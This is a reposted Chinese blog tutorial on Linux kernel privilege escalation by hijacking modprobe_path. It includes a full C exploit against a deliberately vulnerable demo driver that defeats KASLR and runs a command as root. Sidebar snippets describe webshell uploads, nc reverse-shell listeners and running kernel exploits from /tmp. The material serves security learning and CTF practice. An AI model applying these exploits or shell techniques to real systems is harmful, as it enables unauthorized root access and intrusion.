linux 内核提权总结(demo+exp分析) -- 任意读写(四)

最新推荐文章于 2022-09-06 17:32:33 发布
最新推荐文章于 2022-09-06 17:32:33 发布
阅读量292 收藏
点赞数
分类专栏: 安全 Linux # Linux内核 文章标签: 内核 linux 安全
原文链接:https://bbs.pediy.com/thread-261725.htm
版权
Linux 同时被 3 个专栏收录
44 篇文章 7 订阅
订阅专栏
安全
34 篇文章 6 订阅
订阅专栏
Linux内核
20 篇文章 7 订阅
订阅专栏

hijack_modprobe_path篇

本文转自网络文章,内容均为非盈利,版权归原作者所有。
转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。
原文作者:jmpcall
专栏地址:https://zhuanlan.kanxue.com/user-815036.htm

 

 

  • 原理同hijack_prctl, 当用户执行错误格式的elf文件时内核调用call_usermodehelper(char *modprobe_path ...)

  • 修改modprobe后,即可实现root权限任意命令执行

  • 攻击流程

    • (内核任意读写漏洞)内核修改全局变量 modprobe_path为目标指令
    • 写入错误格式elf文件,并手动执行,触发

一. 利用步骤

1. 定位modprobe_path(开启kaslr)

  • 同hijack_vdso,泄漏vdso地址,因为内核kaslr开启后,只有较高字节的地址发生偏移,且vdso与基地址相距较近,所以可以使用vdso定位内核加载地址

  • 获得当前调试阶段modprobe_path与内核基地址固定偏移

  • modprobe_path_addr = 内核基地址+固定偏移

2. 修改modprobe_path 为任意指令

 

二. 驱动代码

见cred篇:linux 内核提权总结(demo+exp分析) -- 任意读写(一)

 

 

三. exp

#define _GNU_SOURCE
 
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/auxv.h>
#include <sys/prctl.h>
 
#define CHANGE_POINT 0x100000
#define RW_READ 0x100001
#define RW_WRITE 0x100002
 
size_t modprobe_path = 0xe3cba0;
size_t vmlinux_base = 0;
 
struct vunl
{
    char *point;
    size_t size;
} VUNL;
 
void leak_data(int fd, char *buf)
{
    char *res = NULL;
 
    VUNL.size = 0x1000;
    for (size_t addr = 0xffffffff80000000; addr < 0xffffffffffffffff; addr += 0x1000)
    {
        VUNL.point = (char *)addr;
 
        ioctl(fd, CHANGE_POINT, &VUNL); //change the point
        ioctl(fd, RW_READ, buf);
        if (!strcmp("gettimeofday", buf + 0x2b5))
        {
            printf("[+] the addr of VDSO is: 0x%lx\n", addr);
            vmlinux_base = addr & 0xffffffffff000000;
            printf("[+] the addr of vmlinux base is: 0x%lx\n", vmlinux_base);
            break;
        }
 
        puts("[-] not found, try again!\n");
    }
    return;
}
 
int main(int argc, char *argv[])
{
    int fd = 0;
    char *buf = malloc(0x1000);
 
    fd = open("/dev/rw_any_dev", O_RDWR);
    leak_data(fd, buf);
    modprobe_path += vmlinux_base;
    printf("[+] the addr of modprobe_path is: 0x%lx\n", modprobe_path);
 
    VUNL.size = strlen(argv[1])+1;
    VUNL.point = (char *)modprobe_path;
    ioctl(fd, CHANGE_POINT, &VUNL);
    ioctl(fd, RW_WRITE, argv[1]);
 
    system("echo -ne '#!/bin/sh\nchmod 777 /flag' > /su.sh");
    system("chmod +x /su.sh");
    system("echo -ne '\\xff\\xff\\xff\\xff' > /dummy");
    system("chmod +x /dummy");
 
    system("/dummy");
 
    return 0;
}

 

北观止
关注
专栏目录
Linux内存从0到1学习笔记(8.10 dma-buf导出器和导入器使用示例 一)
从0到1,突破自己
12-20 4361
前面的博客提到过,dma-buf的使用包括导出器(exporter)和导入器(importer),导出器需要实现并管理dma_buf_ops中定义的操作,而导入器的操作由结构体dma_buf_attachment来提供。
取自开源,分享于开源 —— 利用CVE-2017-8890漏洞ROOT天猫魔屏A1
god
05-12 3974
本来对阿里的东西挺有好感的,没想到这么一个东西就一个开机广告问题把我的好感败光了。 入手的时候根本没有什么开机广告,使用三个月之后一次系统更新就出现了开机广告。感情升级就是生个开机广告?果断投诉。 可是又如何呢?最多只是把我提到的“开机广告音量大,吓死人,还不可调节音量”修改了,开机广告还是存在。 就算是入手五个月还是比较新的,直接拆了,然后扔一边,搬家的时候就当垃圾扔了。 什么阿里! 突然翻到之前的记录,躺着也是躺着,就分享下。 ...
简单的linux提权收集的N多linux内核exp
03-12
拿到shell了,准备提权.先看下linux内核 2.6.18-194.11.3.el5 内核 2010的,这个好CentOS release 5.5好提 然后百度或者其它路径找EXP,2.6.18-194这个内核我已经收藏过.上传到/tmp,为什么要传到这个目录呢? 因为tmp目录可写可执行一般,继续ing. 找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666 然后再点你shell 连接成功就出现下面的内容 然后我们进到/tmp目录 cd /tmp 进入到tmp目录了,看下我们之前上传的2.6.18-194 我这里有权限rwx,可读可写可执行.如果没有权限chmod -R 777 文件名 我这里的exp已编译过了,直接执行溢出就ok了 ./2.6.18-194 要是你的exp没有编译gcc -o /tmp/文件名 /tmp/文件名.c ,自己编译下就行了 成功了 其实linux提权还是很简单,关键看有没exp
linux 内核提权总结(demo+exp分析) -- 任意读写(一)
北观止的博客
12-23 433
cred篇 每个线程在内核中都对应一个线程结构块thread_info thread_info中存在task_struct类型结构体 struct task_struct中存在cred结构体用来保存线程权限 攻击流程 定位某进程的cred结构体 将cred结构提结构体的uid~fsgid全部覆写为0(前28字节) 原文地址 一. 利用步骤 1. 定位cred结构体 task_struct中存在char comm[TASK_COMM_LEN] co.
linux 内核提权总结(demo+exp分析) -- ROP(一)
北观止的博客
12-23 1568
基础ROP篇(linux 5.0.21) 内核提权与用户态攻击的区别 攻击流程 用户态攻击: 执行 system("/bin/sh") 获得shell 内核提权: 内核执行 commit_creds(prepare_kernel_cred(0)) 使进程获得root权限 用户态进程执行system("/bin/sh") 获得root权限 shell 原文地址 理解难点 内核rop链构造 用户态进程与内核之间的切换 一. 漏洞分析 建议初学者先了解基础的驱动程序
Linux提权exp大全
weixin_30437847的博客
08-07 609
如下表 #CVE  #Description  #Kernels CVE-2017-1000367  [Sudo] (Sudo 1.8.6p7 - 1.8.20) CVE-2017-7494  [Samba Remote execution] (Samba 3.5.0-4.6.4/4.5.10/4.4.14) CVE-2016-5195  [Dirty cow] ...
linux提权
qq_42307546的博客
04-13 3116
常用命令 uname -a #查看内核/操作系统/cpu信息 hend -n 1 /etc/issue #查看操作系统版本 cat /proc/version #查看系统信息 hostname #查看计算机名 env #查看环境变量 ifconfig #查看网卡 netstat -lntp # 查看所有监听端口 netstat -antp # 查看所有已经建立的连接 netstat -s # 查看网络统计信息 iptables -L #查看防火墙设置 route -n # 查看路由表 ps -ef # 查.
111.网络安全渗透测试—[权限提升篇9]—[Windows 2008 R2内核溢出提权]
qwsn
07-05 3533
在winserver2008 R2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令。如果没有进行补丁修复可以利用一些溢出提权工具,进行提权。 这个版本的提权工具,可以对winserver2008 的系统进行溢出提权 (2)靶机链接: URL:第一步: 【以上过程略】以下进行提权过程:第二步: 在winserver2008 R2中,服务器默认是支持aspx的。所以默认都是可以执行一些命令: 第三步: 扫描结果:扫描失败 第步: 把systeminfo的信息放入该网址中,检索相
尚硅谷 Linux网络服务&数据库 笔记
LiuKairui的博客
04-08 4545
目录网络基础服务CentOS6与CentOS7区别常见的网络协议与端口网关和路由网络管理命令SSH管理TCP Wrappers 简单防火墙DHCP服务DHCP的工作原理DHCP服务搭建DNS服务域名的组成与分类域名解析过程DNS实验VSFTP服务VSFTP服务概述登录验证方式使用FTP普通实验openSSL+vsftp加密验证SAMBA服务Samba概述登录验证模式基本使用实验NFS服务NFS挂载原理实验LAMP平台环境搭建Apache启动方式工作模式文件位置配置文件Apache目录别名实验Apache用户
ym——Andorid-15k+的面试题。
热门推荐
陈宇明
08-07 2万+
最近才开的博客,希望大家多多关注,andorid开发也做了3年有余了,也面试很多加企业,借此机会分享一下,我们中遇到过的问题以及解决方案吧,希望能够对正在找工作的andoird程序员有一定的帮助。学完本人博客发表《ym--andorid从零开始教程》+面试题目全理解,年薪18w以上绝对没问题。 特别献上整理过的50道面试题目 1.listView的优化方式 重用conve
linux内核exp,简单的linux提权收集的N多linux内核exp
weixin_30140317的博客
05-08 229
这是简单的linux提权收集的N多linux内核exp下载,创建一个表, Linux低权限提权 反弹试试 tmp里创建好文件,就可以利用这个函数执行命令,准备提权.先看下linux内核 uname -a 2.6.18-194.11.3.el5 内核 2010的,我们是要来做其他的事情。软件介绍简单的linux提权收集的N多linux内核exp是按照上面的方法,可能报错会显示出来,估计修改过了 试着...
kmem 反编译linux内核_【linux内核漏洞利用】StringIPC—从任意读写到权限提升三种方法(一)...
weixin_39867662的博客
12-06 402
题目:CSAW-2015-CTF的stringipc环境下载:https://github.com/bsauce/CTF/tree/master/stringipc目的:学习三种从内存任意读写到权限提升的利用方法。环境搭建:内核版本—linux-4.4.184 (gcc-4.7不行,得用gcc-5) busybox版本—1.31.0str...
提权姿势modprobe_path修改文件权限
csdn546229768的博客
05-02 472
最近看内核exp时候一些题目的另一种解法可以通过modprobe_path方式读取flag,好像挺好玩的 定义 在内核运行一个未知类型的文件时,modprobe_path就会指向这个未知文件,当内核运行一个错误格式的文件后,内核会自动调用这个modprobe_path指向的文件,因为内核执行的权限是root权限,当我们将modprobe_path指向一个我们用于查看具有root权限的flag文件,那么就能得到flag //源码定义如下:kernel/kmod.c char modprobe_path[KMO
基于modprobe_path的内核提权方法
weixin_46483787的博客
04-18 795
什么是modprobe? 这玩意就是用于在Linux内核中添加一个可加载的内核模块,或者从内核中移除一个可加载的内核模块,它是我们在Linux内核中安装或卸载新模块时都要执行的一个程序。该程序的路径是一个内核全局变量,默认为/sbin/modprobe,我们可以通过运行以下命令来查看该路径: cat /proc/sys/kernel/modprobe 这个路径是可写的,普通用户也是可以更改它的 而当内核运行一个错误格式的文件(或未知文件类型的文件)的时候,也会调用这个 modprobe_path所指向
linux 负数_linux内核提权系列教程(2):任意地址读写提权的4种方法
weixin_39844549的博客
11-30 391
一、漏洞代码分析代码见arbitrary.h。1.功能函数介绍功能输入结构名输入结构功能ARBITRARY_RW_INITinit_argssize初始化全局对象,存于g_mem_buffer。kmalloc(size)空间存于*dataARBITRARY_RW_REALLOCrealloc_argsgrow; size;grow为1则扩充,为0则缩小。da...
记一个linux内核内存提权问题
dssxk的专栏
05-25 1162
前些天,linux内核曝出了一个内存提权漏洞。通过骇客的精心构造,suid程序将print的输出信息写到了自己的/proc/$pid/mem文件里面,从而修改了自己的可执行代码,为普通用户开启了一个带root权限的shell。这个过程还是挺有意思的,不得不佩服骇客们的聪明才智,故在此分享一下,以表崇敬之情。   首先,破解过程使用到了suid程序。suid并不是一个程序,而是可执行文件的一种属
RHEL提权
shizheng654的专栏
11-27 577
啥都不说直接开始
linux内核提权
游魂的博客
01-27 2703
记一次linux内核提权 首先要得到一个webshell传个大马上去。 看到这里我已经传进去一个ma.php的大马,现在去访问它! 找到linux提权,开启kali系统,用nc弹个shell回来。 进入kali系统,输入nv -lvvp 12666等待连接。 输入kali系统的ip和端口。 点击开始链接后返回kali系统查看。 可以看到shell已经弹回来了,权限是www-data比较低的...
linux hook方法整理
jinking01的专栏
09-06 1578
linux上使用hook的方法总结
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值